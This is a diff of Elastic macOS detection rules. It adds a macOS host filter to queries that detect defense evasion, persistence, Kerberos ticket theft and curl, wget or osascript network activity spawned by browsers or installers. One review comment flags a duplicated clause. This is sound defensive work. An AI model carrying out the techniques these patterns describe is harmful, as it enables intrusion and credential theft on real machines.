 query = '''
-event.category:process and event.type:(start or process_started) and
+event.category:process and host.os.type:macos and event.type:(start or process_started) and
 process.name:security and process.args:"add-trusted-cert" and
 not process.parent.executable:("/Library/Bitdefender/AVP/product/bin/BDCoreIssues" or
 "/Applications/Bitdefender/SecurityNetworkInstallerApp.app/Contents/MacOS/SecurityNetworkInstallerApp" )
diff --git a/rules/macos/defense_evasion_modify_environment_launchctl.toml b/rules/macos/defense_evasion_modify_environment_launchctl.toml
index 2c07f5e0c..b5cf69d66 100644
--- a/rules/macos/defense_evasion_modify_environment_launchctl.toml
+++ b/rules/macos/defense_evasion_modify_environment_launchctl.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -29,7 +29,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and event.type:start and
+event.category:process and host.os.type:macos and event.type:start and
 process.name:launchctl and
 process.args:(setenv and not (JAVA*_HOME or
 RUNTIME_JAVA_HOME or
diff --git a/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml b/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml
index dd16dfa94..f5b45a616 100644
--- a/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml
+++ b/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -35,7 +35,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type in ("start", "process_started") and process.name : "sqlite*" and
+process where host.os.type == "macos" and event.type in ("start", "process_started") and process.name : "sqlite*" and
 process.args : "/*/Application Support/com.apple.TCC/TCC.db" and not process.parent.executable : "/Library/Bitdefender/AVP/product/bin/*"
 '''
diff --git a/rules/macos/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.toml b/rules/macos/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.toml
index 0a39d60e1..7b889e155 100644
--- a/rules/macos/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.toml
+++ b/rules/macos/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -33,7 +33,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type in ("start", "process_started") and
+process where host.os.type == "macos" and event.type in ("start", "process_started") and
 process.name:"scp" and process.args:"StrictHostKeyChecking=no" and process.command_line:("scp *localhost:/*", "scp *127.0.0.1:/*") and
diff --git a/rules/macos/defense_evasion_safari_config_change.toml b/rules/macos/defense_evasion_safari_config_change.toml
index 9007035ba..de8f67592 100644
--- a/rules/macos/defense_evasion_safari_config_change.toml
+++ b/rules/macos/defense_evasion_safari_config_change.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -27,7 +27,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and event.type:start and
+event.category:process and host.os.type:macos and event.type:start and
 process.name:defaults and process.args:
 (com.apple.Safari and write and not
 (
diff --git a/rules/macos/defense_evasion_sandboxed_office_app_suspicious_zip_file.toml b/rules/macos/defense_evasion_sandboxed_office_app_suspicious_zip_file.toml
index 746c3d203..742ae3a5f 100644
--- a/rules/macos/defense_evasion_sandboxed_office_app_suspicious_zip_file.toml
+++ b/rules/macos/defense_evasion_sandboxed_office_app_suspicious_zip_file.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -31,7 +31,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:file and not event.type:deletion and file.name:~$*.zip and host.os.type:macos
+event.category:file and host.os.type:macos and not event.type:deletion and file.name:~$*.zip and host.os.type:macos
 '''
diff --git a/rules/macos/defense_evasion_tcc_bypass_mounted_apfs_access.toml b/rules/macos/defense_evasion_tcc_bypass_mounted_apfs_access.toml
index f6244bcbf..e9e3a497a 100644
--- a/rules/macos/defense_evasion_tcc_bypass_mounted_apfs_access.toml
+++ b/rules/macos/defense_evasion_tcc_bypass_mounted_apfs_access.toml
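Review bot: The new query line in defense_evasion_sandboxed_office_app_suspicious_zip_file.toml carries `host.os.type:macos` twice: once inserted after `event.category:file` by the mechanical rewrite, and once retained at the end of the line, where the original query already had it. The duplicate does not change what matches, but it reads as a copy-paste slip and will confuse anyone later grepping for rules that still need the OS gate; drop the trailing clause so the line becomes `event.category:file and host.os.type:macos and not event.type:deletion and file.name:~$*.zip`.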
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -27,8 +27,8 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category : process and event.type : (start or process_started) and process.name : mount_apfs and
- process.args : (/System/Volumes/Data and noowners)
+event.category:process and host.os.type:macos and event.type:(start or process_started) and process.name:mount_apfs and
+ process.args:(/System/Volumes/Data and noowners)
 '''
diff --git a/rules/macos/defense_evasion_unload_endpointsecurity_kext.toml b/rules/macos/defense_evasion_unload_endpointsecurity_kext.toml
index 211c7ac93..0cb1d180e 100644
--- a/rules/macos/defense_evasion_unload_endpointsecurity_kext.toml
+++ b/rules/macos/defense_evasion_unload_endpointsecurity_kext.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -22,7 +22,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and event.type:(start or process_started) and
+event.category:process and host.os.type:macos and event.type:(start or process_started) and
 process.name:kextunload and process.args:("/System/Library/Extensions/EndpointSecurity.kext" or "EndpointSecurity.kext")
 '''
diff --git a/rules/macos/discovery_users_domain_built_in_commands.toml b/rules/macos/discovery_users_domain_built_in_commands.toml
index d5852cdd6..0cd8ff516 100644
--- a/rules/macos/discovery_users_domain_built_in_commands.toml
+++ b/rules/macos/discovery_users_domain_built_in_commands.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/18" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type in ("start", "process_started") and +process where host.os.type == "macos" and event.type in ("start", "process_started") and ( process.name : ("ldapsearch", "dsmemberutil") or (process.name : "dscl" and diff --git a/rules/macos/execution_defense_evasion_electron_app_childproc_node_js.toml b/rules/macos/execution_defense_evasion_electron_app_childproc_node_js.toml index b9feacbfb..7053ddcd0 100644 --- a/rules/macos/execution_defense_evasion_electron_app_childproc_node_js.toml +++ b/rules/macos/execution_defense_evasion_electron_app_childproc_node_js.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:(start or process_started) and process.args:("-e" and const*require*child_process*) +event.category:process and host.os.type:macos and event.type:(start or process_started) and process.args:("-e" and const*require*child_process*) ''' diff --git a/rules/macos/execution_initial_access_suspicious_browser_childproc.toml b/rules/macos/execution_initial_access_suspicious_browser_childproc.toml index ca2de771e..a523e0c62 100644 --- a/rules/macos/execution_initial_access_suspicious_browser_childproc.toml +++ b/rules/macos/execution_initial_access_suspicious_browser_childproc.toml 
@@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type in ("start", "process_started") and +process where host.os.type == "macos" and event.type in ("start", "process_started") and process.parent.name : ("Google Chrome", "Google Chrome Helper*", "firefox", "Opera", "Safari", "com.apple.WebKit.WebContent", "Microsoft Edge") and process.name : ("sh", "bash", "dash", "ksh", "tcsh", "zsh", "curl", "wget", "python*", "perl*", "php*", "osascript", "pwsh") and process.command_line != null and diff --git a/rules/macos/execution_installer_package_spawned_network_event.toml b/rules/macos/execution_installer_package_spawned_network_event.toml index 3d8c4d11d..82a1917e9 100644 --- a/rules/macos/execution_installer_package_spawned_network_event.toml +++ b/rules/macos/execution_installer_package_spawned_network_event.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] 
@@ -39,8 +39,8 @@ type = "eql"
 query = '''
 sequence by host.id, user.id with maxspan=30s
-[process where event.type == "start" and event.action == "exec" and process.parent.name : ("installer", "package_script_service") and process.name : ("bash", "sh", "zsh", "python", "osascript", "tclsh*")]
-[network where event.type == "start" and process.name : ("curl", "osascript", "wget", "python")]
+[process where host.os.type == "macos" and event.type == "start" and event.action == "exec" and process.parent.name : ("installer", "package_script_service") and process.name : ("bash", "sh", "zsh", "python", "osascript", "tclsh*")]
+[network where host.os.type == "macos" and event.type == "start" and process.name : ("curl", "osascript", "wget", "python")]
 '''
diff --git a/rules/macos/execution_script_via_automator_workflows.toml b/rules/macos/execution_script_via_automator_workflows.toml
index 87f0d06eb..dc1d974fa 100644
--- a/rules/macos/execution_script_via_automator_workflows.toml
+++ b/rules/macos/execution_script_via_automator_workflows.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -27,8 +27,8 @@ type = "eql"
 query = '''
 sequence by host.id with maxspan=30s
- [process where event.type in ("start", "process_started") and process.name == "automator"]
- [network where process.name:"com.apple.automator.runner"]
+ [process where host.os.type == "macos" and event.type in ("start", "process_started") and process.name == "automator"]
+ [network where host.os.type == "macos" and process.name:"com.apple.automator.runner"]
 '''
diff --git a/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml b/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml
index 2dfb201eb..904bf6e58 100644
--- a/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml +++ b/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,8 +29,8 @@ type = "eql" query = ''' sequence by host.id, process.entity_id with maxspan=30s - [process where event.type == "start" and process.name == "osascript"] - [network where event.type != "end" and process.name == "osascript" and destination.ip != "::1" and + [process where host.os.type == "macos" and event.type == "start" and process.name == "osascript"] + [network where host.os.type == "macos" and event.type != "end" and process.name == "osascript" and destination.ip != "::1" and not cidrmatch(destination.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", "192.0.0.0/29", "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", "192.0.0.171/32", "192.0.2.0/24", "192.31.196.0/24", diff --git a/rules/macos/execution_shell_execution_via_apple_scripting.toml b/rules/macos/execution_shell_execution_via_apple_scripting.toml index 88e998340..d31d72b9c 100644 --- a/rules/macos/execution_shell_execution_via_apple_scripting.toml +++ b/rules/macos/execution_shell_execution_via_apple_scripting.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] 
@@ -29,8 +29,8 @@ type = "eql" query = ''' sequence by host.id with maxspan=5s - [process where event.type in ("start", "process_started", "info") and process.name == "osascript"] by process.pid - [process where event.type in ("start", "process_started") and process.name == "sh" and process.args == "-c"] by process.parent.pid + [process where host.os.type == "macos" and event.type in ("start", "process_started", "info") and process.name == "osascript"] by process.pid + [process where host.os.type == "macos" and event.type in ("start", "process_started") and process.name == "sh" and process.args == "-c"] by process.parent.pid ''' diff --git a/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml b/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml index 24ba5f00c..29f9874dc 100644 --- a/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml +++ b/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,7 +27,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type in ("start", "process_started") and +process where host.os.type == "macos" and event.type in ("start", "process_started") and process.parent.name:("Microsoft Word", "Microsoft PowerPoint", "Microsoft Excel") and process.name: ( diff --git a/rules/macos/lateral_movement_credential_access_kerberos_bifrostconsole.toml b/rules/macos/lateral_movement_credential_access_kerberos_bifrostconsole.toml index a252f7b89..e3242ebfa 100644 --- a/rules/macos/lateral_movement_credential_access_kerberos_bifrostconsole.toml +++ b/rules/macos/lateral_movement_credential_access_kerberos_bifrostconsole.toml 
@@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:start and +event.category:process and host.os.type:macos and event.type:start and process.args:("-action" and ("-kerberoast" or askhash or asktgs or asktgt or s4u or ("-ticket" and ptt) or (dump and (tickets or keytab)))) ''' diff --git a/rules/macos/lateral_movement_mounting_smb_share.toml b/rules/macos/lateral_movement_mounting_smb_share.toml index 51961d91b..ae500fd7f 100644 --- a/rules/macos/lateral_movement_mounting_smb_share.toml +++ b/rules/macos/lateral_movement_mounting_smb_share.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type in ("start", "process_started") and +process where host.os.type == "macos" and event.type in ("start", "process_started") and ( process.name : "mount_smbfs" or (process.name : "open" and process.args : "smb://*") or diff --git a/rules/macos/lateral_movement_remote_ssh_login_enabled.toml b/rules/macos/lateral_movement_remote_ssh_login_enabled.toml index 174805aaa..355f6ed95 100644 --- a/rules/macos/lateral_movement_remote_ssh_login_enabled.toml +++ b/rules/macos/lateral_movement_remote_ssh_login_enabled.toml 
@@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,7 +27,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:(start or process_started) and +event.category:process and host.os.type:macos and event.type:(start or process_started) and process.name:systemsetup and process.args:("-setremotelogin" and on) and not process.parent.executable : /usr/local/jamf/bin/jamf diff --git a/rules/macos/lateral_movement_vpn_connection_attempt.toml b/rules/macos/lateral_movement_vpn_connection_attempt.toml index f2b8a09c1..4bac49ec9 100644 --- a/rules/macos/lateral_movement_vpn_connection_attempt.toml +++ b/rules/macos/lateral_movement_vpn_connection_attempt.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -34,7 +34,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type in ("start", "process_started") and +process where host.os.type == "macos" and event.type in ("start", "process_started") and ( (process.name : "networksetup" and process.args : "-connectpppoeservice") or (process.name : "scutil" and process.args : "--nc" and process.args : "start") or diff --git a/rules/macos/persistence_account_creation_hide_at_logon.toml b/rules/macos/persistence_account_creation_hide_at_logon.toml index 29c6f16e6..91637f90a 100644 --- a/rules/macos/persistence_account_creation_hide_at_logon.toml +++ b/rules/macos/persistence_account_creation_hide_at_logon.toml 
@@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:(start or process_started) and +event.category:process and host.os.type:macos and event.type:(start or process_started) and process.name:dscl and process.args:(IsHidden and create and (true or 1 or yes)) ''' diff --git a/rules/macos/persistence_creation_change_launch_agents_file.toml b/rules/macos/persistence_creation_change_launch_agents_file.toml index a1fa513f0..25a9794e9 100644 --- a/rules/macos/persistence_creation_change_launch_agents_file.toml +++ b/rules/macos/persistence_creation_change_launch_agents_file.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,10 +29,10 @@ type = "eql" query = ''' sequence by host.id with maxspan=1m - [file where event.type != "deletion" and + [file where host.os.type == "macos" and event.type != "deletion" and file.path : ("/System/Library/LaunchAgents/*", "/Library/LaunchAgents/*", "/Users/*/Library/LaunchAgents/*") ] - [process where event.type in ("start", "process_started") and process.name == "launchctl" and process.args == "load"] + [process where host.os.type == "macos" and event.type in ("start", "process_started") and process.name == "launchctl" and process.args == "load"] ''' diff --git a/rules/macos/persistence_creation_hidden_login_item_osascript.toml b/rules/macos/persistence_creation_hidden_login_item_osascript.toml index 4bf445cbf..08a0bd51f 100644 
--- a/rules/macos/persistence_creation_hidden_login_item_osascript.toml
+++ b/rules/macos/persistence_creation_hidden_login_item_osascript.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -29,7 +29,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type in ("start", "process_started") and process.name : "osascript" and
+process where host.os.type == "macos" and event.type in ("start", "process_started") and process.name : "osascript" and
 process.command_line : "osascript*login item*hidden:true*"
 '''
diff --git a/rules/macos/persistence_creation_modif_launch_deamon_sequence.toml b/rules/macos/persistence_creation_modif_launch_deamon_sequence.toml
index 61801657a..8c68b7350 100644
--- a/rules/macos/persistence_creation_modif_launch_deamon_sequence.toml
+++ b/rules/macos/persistence_creation_modif_launch_deamon_sequence.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -29,8 +29,8 @@ type = "eql"
 query = '''
 sequence by host.id with maxspan=1m
- [file where event.type != "deletion" and file.path : ("/System/Library/LaunchDaemons/*", "/Library/LaunchDaemons/*")]
- [process where event.type in ("start", "process_started") and process.name == "launchctl" and process.args == "load"]
+ [file where host.os.type == "macos" and event.type != "deletion" and file.path : ("/System/Library/LaunchDaemons/*", "/Library/LaunchDaemons/*")]
+ [process where host.os.type == "macos" and event.type in ("start", "process_started") and process.name == "launchctl" and process.args == "load"]
 '''
diff --git a/rules/macos/persistence_credential_access_authorization_plugin_creation.toml b/rules/macos/persistence_credential_access_authorization_plugin_creation.toml index 074ab73f5..7c6c6505f 100644 --- a/rules/macos/persistence_credential_access_authorization_plugin_creation.toml +++ b/rules/macos/persistence_credential_access_authorization_plugin_creation.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:file and not event.type:deletion and +event.category:file and host.os.type:macos and not event.type:deletion and file.path:(/Library/Security/SecurityAgentPlugins/* and not /Library/Security/SecurityAgentPlugins/TeamViewerAuthPlugin.bundle/*) and not process.name:shove and process.code_signature.trusted:true diff --git a/rules/macos/persistence_crontab_creation.toml b/rules/macos/persistence_crontab_creation.toml index f5fdd41fe..f1e931f5e 100644 --- a/rules/macos/persistence_crontab_creation.toml +++ b/rules/macos/persistence_crontab_creation.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type != "deletion" and process.name != null and +file where host.os.type == "macos" and event.type != "deletion" and process.name != null and file.path : "/private/var/at/tabs/*" and not process.executable == "/usr/bin/crontab" ''' 
diff --git a/rules/macos/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.toml b/rules/macos/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.toml index c6405ec4d..02f62bd67 100644 --- a/rules/macos/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.toml +++ b/rules/macos/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:(start or process_started) and +event.category:process and host.os.type:macos and event.type:(start or process_started) and process.name:.* and process.parent.executable:/sbin/launchd ''' diff --git a/rules/macos/persistence_directory_services_plugins_modification.toml b/rules/macos/persistence_directory_services_plugins_modification.toml index f58ad4389..541014d24 100644 --- a/rules/macos/persistence_directory_services_plugins_modification.toml +++ b/rules/macos/persistence_directory_services_plugins_modification.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,7 +27,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:file and not event.type:deletion and +event.category:file and host.os.type:macos and not event.type:deletion and file.path:/Library/DirectoryServices/PlugIns/*.dsplug ''' 
diff --git a/rules/macos/persistence_docker_shortcuts_plist_modification.toml b/rules/macos/persistence_docker_shortcuts_plist_modification.toml
index 749ab0d86..a49e9bcee 100644
--- a/rules/macos/persistence_docker_shortcuts_plist_modification.toml
+++ b/rules/macos/persistence_docker_shortcuts_plist_modification.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -28,9 +28,9 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category : file and event.action : modification and
- file.path : /Users/*/Library/Preferences/com.apple.dock.plist and
- not process.name : (xpcproxy or cfprefsd or plutil or jamf or PlistBuddy or InstallerRemotePluginService)
+event.category:file and host.os.type:macos and event.action:modification and
+ file.path:/Users/*/Library/Preferences/com.apple.dock.plist and
+ not process.name:(xpcproxy or cfprefsd or plutil or jamf or PlistBuddy or InstallerRemotePluginService)
 '''
diff --git a/rules/macos/persistence_emond_rules_file_creation.toml b/rules/macos/persistence_emond_rules_file_creation.toml
index 6dbbc7335..1c92f9e8c 100644
--- a/rules/macos/persistence_emond_rules_file_creation.toml
+++ b/rules/macos/persistence_emond_rules_file_creation.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -33,7 +33,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type != "deletion" and +file where host.os.type == "macos" and event.type != "deletion" and file.path : ("/private/etc/emond.d/rules/*.plist", "/etc/emon.d/rules/*.plist", "/private/var/db/emondClients/*") ''' diff --git a/rules/macos/persistence_emond_rules_process_execution.toml b/rules/macos/persistence_emond_rules_process_execution.toml index 1782d3b9d..0c3ca76be 100644 --- a/rules/macos/persistence_emond_rules_process_execution.toml +++ b/rules/macos/persistence_emond_rules_process_execution.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,7 +27,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type in ("start", "process_started") and +process where host.os.type == "macos" and event.type in ("start", "process_started") and process.parent.name : "emond" and process.name : ( "bash", diff --git a/rules/macos/persistence_enable_root_account.toml b/rules/macos/persistence_enable_root_account.toml index 4a88b411b..705bf9c64 100644 --- a/rules/macos/persistence_enable_root_account.toml +++ b/rules/macos/persistence_enable_root_account.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:(start or process_started) and +event.category:process and host.os.type:macos and event.type:(start or process_started) and process.name:dsenableroot and not process.args:"-d" ''' 
diff --git a/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml b/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml index 19e364367..8760f3cb1 100644 --- a/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml +++ b/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -32,7 +32,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type != "deletion" and +file where host.os.type == "macos" and event.type != "deletion" and file.path : ( "/System/Library/LaunchAgents/.*.plist", diff --git a/rules/macos/persistence_finder_sync_plugin_pluginkit.toml b/rules/macos/persistence_finder_sync_plugin_pluginkit.toml index 0f0d13a49..a8287867c 100644 --- a/rules/macos/persistence_finder_sync_plugin_pluginkit.toml +++ b/rules/macos/persistence_finder_sync_plugin_pluginkit.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type in ("start", "process_started") and process.name : "pluginkit" and +process where host.os.type == "macos" and event.type in ("start", "process_started") and process.name : "pluginkit" and process.args : "-e" and process.args : "use" and process.args : "-i" and not process.args : ( diff --git a/rules/macos/persistence_folder_action_scripts_runtime.toml b/rules/macos/persistence_folder_action_scripts_runtime.toml index f75a11f35..382b9eeba 100644 
